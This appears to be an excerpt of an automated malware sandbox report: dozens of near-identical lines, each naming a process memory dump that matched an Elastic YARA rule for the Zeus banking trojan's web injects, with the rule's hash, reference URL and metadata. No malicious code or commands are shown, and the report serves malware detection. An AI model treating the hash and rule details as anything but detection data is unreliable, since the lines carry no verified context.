Source: 00000000.00000003.2027860859.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2500002475.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2499726055.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000005.00000002.2689381612.0000000000DD0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000001D.00000002.2479482654.0000000002D00000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2048298647.0000000002970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2508798151.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2482262641.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2499866560.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2487147831.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2392591021.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000015.00000002.2460078038.0000000002B30000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2458081836.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2422680364.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2500272198.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000001F.00000002.2486303903.0000000002410000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000002.3269898642.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000005.00000002.2689429346.0000000000E30000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000001B.00000002.2475050431.00000000029F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2508679184.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000008.00000002.2747738831.0000000000C50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000022.00000002.2487689003.0000000002950000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2510071854.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000013.00000002.2455624289.0000000001450000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2395495961.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000015.00000002.2460508314.0000000002CD0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2500141724.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000000C.00000002.2700342737.00000000014B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000026.00000002.2502070915.0000000002760000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000022.00000002.2487542677.00000000027F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2510491693.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000004.00000002.2719273525.0000000001240000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2448622131.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2508393493.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2501374465.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2497016320.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000026.00000002.2502168671.0000000002900000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000001D.00000002.2478719931.0000000002920000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2501604041.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
